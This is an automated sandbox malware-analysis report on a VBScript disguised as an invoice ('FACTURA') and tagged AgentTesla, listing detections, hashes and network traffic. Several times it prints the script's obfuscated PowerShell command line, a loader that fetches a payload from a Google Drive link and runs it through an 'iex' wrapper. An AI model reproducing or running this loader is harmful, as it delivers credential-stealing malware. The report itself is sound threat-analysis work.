Windows Analysis Report
FACTURA 130424435.vbs

Overview

General Information

Sample name: FACTURA 130424435.vbs
Analysis ID: 1427933
MD5: 361f71c64cdcf7f56f8e6c2389401b89
SHA1: 315b4b37555a2b0f82837a94753fbd36bad2f5fd
SHA256: dbc99b1d313999e21fd15d8386d69d56067c2a578c9658fbff8f749e93f04eae
Tags: AgentTeslavbs
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

barindex
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: FACTURA 130424435.vbs ReversingLabs: Detection: 23%
Source: FACTURA 130424435.vbs Virustotal: Detection: 11% Perma Link
Source: unknown HTTPS traffic detected: 142.250.105.102:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: Binary string: re.pdbM source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1530394780.000001C5ECC94000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbS source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1530197727.000001C5ECC80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb4 source: powershell.exe, 00000002.00000002.1529537443.000001C5ECAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1530394780.000001C5ECCEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdbpdblib.pdb source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.1530394780.000001C5ECCEB000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: wscript.exe, 00000000.00000002.1374995986.0000013D6B198000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1372256990.0000013D6B125000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373234787.0000013D6B12F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373946365.0000013D6B198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.1364056176.0000013D6CFE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1364907873.0000013D6CFE0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.1375982993.0000013D6D270000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab(
Source: wscript.exe, 00000000.00000002.1374995986.0000013D6B198000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1372256990.0000013D6B125000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373234787.0000013D6B12F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373946365.0000013D6B198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab.De
Source: wscript.exe, 00000000.00000003.1365415710.0000013D6D2C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5fe8a61cef167
Source: wscript.exe, 00000000.00000003.1363955829.0000013D6D29D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1365415710.0000013D6D2C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5fe8a61cef
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1520345452.000001C5901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1485282092.000001C580001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1485282092.000001C580001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1485282092.000001C58046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C5804F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581E49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000002.00000002.1485282092.000001C5818BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbHP
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C58048C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C58048C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH&export=download
Source: powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1485282092.000001C5812CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1520345452.000001C5901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.1485282092.000001C58046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C5804F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581E49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.1485282092.000001C58046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C5804F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581E49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C580488000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown HTTPS traffic detected: 142.250.105.102:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.8:49707 version: TLS 1.2

System Summary

barindex
Source: amsi64_1644.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1644, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6649
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6649 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i Erkl
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i Erkl Jump to behavior
Source: FACTURA 130424435.vbs Initial sample: Strings found which are bigger than 50
Source: amsi64_1644.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1644, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: powershell.exe, 00000002.00000002.1525907619.000001C5EA9ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;.VBPe
Source: classification engine Classification label: mal100.expl.evad.winVBS@6/6@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Cabassou.Tun Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xef2zxxa.h5r.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: FACTURA 130424435.vbs ReversingLabs: Detection: 23%
Source: FACTURA 130424435.vbs Virustotal: Detection: 11%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i Erkl
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cabassou.Tun && echo $"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo 